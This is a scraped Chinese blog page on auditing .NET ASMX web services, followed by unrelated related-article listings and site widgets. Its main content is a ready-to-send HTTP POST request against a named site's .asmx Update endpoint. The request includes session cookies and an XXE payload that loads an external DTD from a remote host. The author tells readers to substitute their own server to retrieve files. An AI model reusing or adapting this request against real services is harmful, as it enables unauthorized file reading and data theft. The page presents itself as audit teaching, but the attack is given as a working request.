.NET代码审计之WebService安全

已于 2023-11-20 10:12:27 修改
阅读量95 收藏
点赞数 1
文章标签: .net 安全 矩阵
于 2023-11-20 10:07:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/134501144
版权

背景是微信群里有伙伴问起asmx接口怎么测试,其实和其他语言的API接口一样,每一条接口都有可能存在SQL注入、XXE、文件读取写入等风险,代码审计时需关注扩展名为 .asmx的文件。在审计XXE漏洞时需看loadxml方法,如下图

HTTP请求Post 需要把xxe.xml地址更换成你的主机地址 ,请求成功之后就会返回一个 xxe.txt

 

POST http://xxx.com/Manage/SOAP/Columns.asmx/Update HTTP/1.1
Host: xxx.com
Connection: keep-alive
Content-Length: 8
Cache-Control: max-age=0
Origin: http://exam.weisha100.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://exam.weisha100.cn/Manage/SOAP/Columns.asmx?op=Update
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ibxaewhdmvyuatw2m0qig0sw; Course_139=139; Course_145=145; Course_125=125; studentvcode=8cff9bf6694dccfc3b6a613d05d51d16; registercode=059fdcd96baeb75112f09fa1dcc740cc; StuedentUID=9182952260bdd0754be375f8607238eb; stuid=946fc793fa38c1acd146742be11e1beb; admincode=ebf12cb74e96e67e63783d93c534ef27; user_pagerSize=15; employee_pagerSize=15; limitdomain_pagerSize=15; logslogin_pagerSize=15;
logswork_pagerSize=15; logindex=3d863b367aa379f71c7afc0c9cdca41d; testarchives_pagerSize=20; archives_pagerSize=20; queserror_pagerSize=15; online_pagerSize=15; Course_88=88; article_39=39; stOnlineNumx=7242
result=<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[
<!ENTITY % remote SYSTEM "http://www.xxxx.com/xxe.xml">
%remote;]>
<root/>
 

 

 


                

        

        

    




    

      

        

            

              
                
                  dot.Net安全矩阵
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
.net调用webservice接口例子源代码

				
			

			

				

					03-15
				

			

		

		

			
				
本示例主要涉及如何在.NET环境中通过源代码调用WebService接口,特别是用于短信通知发送的功能。  首先,我们需要理解WebService的基本概念。WebService是一种基于XML(Extensible Markup Language)的标准,用于...

			
		

	



                

              
                



	

		

			

				
					
ASP.NET如何定时调用WebService服务

				
			

			

				

					10-23
				

			

		

		

			
				
在ASP.NET程序中,可以通过Time组件实现定时器功能,但是它与数据库中的任务计划不一样,它必须基于程序正在运行中才可生效,而数据库任务计划是不需要基于ASP.NET程序运行而执行任务。

			
		

	



                


  
              

                


	

		

			

				
					
web service 接口安全与解决方案

				
			

			

				

					tawdx2008的专栏
				

				

					05-04
					
					316
					
				

			

		

		

			
				
http://ee.riaos.com/?p=20008590 转载 web service 接口安全与解决方案

			
		

	





	

		

			

				
					
C#访问带有安全协议的Webservice(https、生成wsdl代理类)

				
			

			

				

					zexin1000的专栏
				

				

					08-30
					
					8995
					
				

			

		

		

			
				
引自:http://www.cnblogs.com/angleSJW/archive/2010/03/16/1687442.html






1.最近公司上项目,其中有一个小栏目 是查询身份证的,就是输入身份证码和姓名返回你的地址和图片的这种,也就是公安部全国公民身份信息系统(NCIIS)我是第一次,中间有几个问题第一个难题是这样的,要验证证书,当时给文档的时候只有一个地址,也只

			
		

	



		

			
		



	

		

			

				
					
.Net WebService基于SoapHeader实现安全认证

				
			

			

				

					u010120164的博客
				

				

					12-12
					
					4299
					
				

			

		

		

			
				
主要是接收android传递的数据容易受到误导,多留意参数变化。 
一、新增一个类MySoapHeaderusing System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Services.Protocols;namespace WebDemo
{
    pub

			
		

	





	

		

			

				
					
在.net中保证WebService的通讯安全

				
			

			

				

					Lawrence的专栏
				

				

					04-20
					
					4683
					
				

			

		

		

			
				
Web Service现在是很通用的技术,在Web Service我们需要验证用户是否有使用此Web Service的权限,并且要保证在通讯过程中的数据安全,防止数据在传输过程中被网络窃听。首先是如何保证Web Service被授权使用,在这里我说的是通过SoapHeader来判断调用Web服务的用户。1.定义一个安全上下文,并且继承于SoapHeader类public class

			
		

	





	

		

			

				
					
ASP.NETWebService的两种身份验证方法(温习)

				
			

			

				

					songjuntao8的专栏
				

				

					05-23
					
					779
					
				

			

		

		

			
				
一、通过SOAP Header身份验证

此方法是通过设置SOAP Header信息来验证身份,主要通过以下几步:

1、在服务端实现一个SOAP Header类

public class CredentialSoapHeader : System.Web.Services.Protocols.SoapHeader
{
 //验证身份的用户名
 public string UserId
 {
 get;
 set;
 }
 //验证身份的密码
...

			
		

	





	

		

			

				
					
Asp.NET Core 如何调用WebService的方法

				
			

			

				

					10-18
				

			

		

		

			
				
主要介绍了Asp.NET Core 如何调用WebService的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧

			
		

	





	

		

			

				
					
.net调用webservice接口例子

				
			

			

				

					09-26
				

			

		

		

			
				
本示例将详细讲解如何使用.NET来调用一个WebService接口,并提供相关的代码实例。  首先,让我们理解Web Service的基本概念。Web Service是一种基于XML(可扩展标记语言)的标准化方法,用于在不同应用程序之间共享...

			
		

	





	

		

			

				
					
ASP.NETWebservice安全 实现访问权限控制

				
			

			

				

					10-22
				

			

		

		

			
				
本文主要讲解ASP.NET中的Webservice安全设置两种方法,一种基于soapheader,一种基于SoapExtensionAttribute,需要的朋友可以参考下。

			
		

	





	

		

			

				
					
Web漏洞之SQL注入详解

				
			

			

				

					2301_80115097的博客
				

				

					10-15
					
					211
					
				

			

		

		

			
				
按照注入点类型来分类1.数字型注入点类似结构id=1基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如 查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回给前台。select * from 表名 where id=1 and 1=12.字符型注入点类似结构name=admin这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。

			
		

	





	

		

			

				
					
asp.net代码审计起始篇之系统搭建

				
			

			

				

					weixin_30415113的博客
				

				

					08-27
					
					292
					
				

			

		

		

			
				
最近开始学习asp.net代码审计,在开始审计之前除了要对语言有些基本的了解,还需要会在本地搭建demo网站方便调试和复现漏洞
准备工作:操作系统:我用的是win10
数据库:我用的sql server 2017
中间件:iis
.Net FrameWork (版本什么的,我目前也不清楚区别)

1.首先是在win10下安装iis以及.Net FrameWor...

			
		

	





	

		

			

				
					
.net6 当连接用户的shell断掉后,dotnet会自动关闭,达不到长期运行的效果。.NET 进程守护

				
			

			

				

					DearXia的博客
				

				

					07-09
					
					361
					
				

			

		

		

			
				
Systemd是一个系统管理守护进程、工具和库的集合,用于取代System V初始进程。Systemd的功能是用于集中管理和配置类UNIX系统。Systemctl是一个systemd工具,主要负责控制systemd系统和服务管理器。如:/etc/systemd/system/testDemoSer.service。6.4 分析systemd启动进程。6.5分析启动时各个进程花费时间。

			
		

	





	

		

			

				
					
同步与异步:.NET 中的 Task.WaitAll 和 Task.WhenAll

				
			

			

				

					技术探索驿站
				

				

					07-10
					
					424
					
				

			

		

		

			
				
Task.WaitAll 是一种同步方法,它会阻塞调用线程,直到所有提供的任务都已完成。当您需要确保一组任务在继续之前已完成时,该方法很有用,但它以阻塞方式执行,这意味着调用 Task.WaitAll 的线程会被占用,直到所有任务都完成为止。Task.WhenAll 是一种异步方法,当所有提供的任务都完成后,该方法将返回单个任务。与 Task.WaitAll 不同,它不会阻止调用线程。相反,它允许调用代码继续异步执行。

			
		

	





	

		

			

				
					
特斯拉的选择:.NET技术栈的工业级魅力

					
最新发布

				
			

			

				

					zls365365的博客
				

				

					07-12
					
					240
					
				

			

		

		

			
				
简述在全球科技巨头的竞技场上,特斯拉以其创新精神和卓越技术引领着电动汽车和可再生能源行业。而在这场技术革命的背后,特斯拉的技术栈选择尤为引人注目。本文将深入探讨特斯拉为何青睐.NET技术栈,并分析这一选择背后的战略考量。技术栈的多元化融合特斯拉的技术架构并非单一,而是一个多元化的生态系统。.NET Core作为其中的重要组成部分,与其他技术如Java、Golang、NodeJS、PHP等共同支撑着...

			
		

	





	

		

			

				
					
记一次 .NET某酒业业务系统 崩溃分析

				
			

			

				

					一线码农的专栏
				

				

					07-09
					
					662
					
				

			

		

		

			
				
说实话这个dump分析起来还是挺有难度的,需要你对Windows线程池clr源码实现有一个基础了解,否则很难构造出完整证据链。

			
		

	





	

		

			

				
					
Spire.PDF for .NET【文档操作】演示:C#/VB.NET:压缩 PDF 文档

				
			

			

				

					励志做最业余的专业博主,控件产品可以私我~
				

				

					07-11
					
					700
					
				

			

		

		

			
				
在本文中,您将学习如何使用Spire.PDF for .NET在 C# 和 VB.NET 中压缩 PDF 文档。

			
		

	





	

		

			

				
					
通过实例说明.NET Autofac依赖注入的多种方式

				
			

			

				

					mengningyun6826的博客
				

				

					07-10
					
					1046
					
				

			

		

		

			
				
通过实例说明.NET Autofac依赖注入的多种方式

			
		

	





	

		

			

				
					
Text Control 控件教程:在 .NET 中打印 MS Word DOCX 文档

				
			

			

				

					励志做最业余的专业博主,控件产品可以私我~
				

				

					07-09
					
					1199
					
				

			

		

		

			
				
虽然有用于创建 DOCX 文件的库(例如 Open XML SDK),但打印又是另一回事。打印 DOCX 文件的唯一方法是在 Microsoft Word 中打开它并手动打印。对于需要打印大量文档的 Web 应用程序或需要自动打印文档的服务器端应用程序来说,这不是一个好的解决方案。

			
		

	





	

		

			

				
					
.net6.0  调用webservice

				
			

			

				

					09-30
				

			

		

		

			
				
在.NET 6.0中调用WebService,可以按照以下步骤进行操作: 1. 首先,需要在项目中添加对System.ServiceModel.Http和System.ServiceModel.Primitives的引用。 2. 在代码中创建一个ChannelFactory对象,用于创建...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值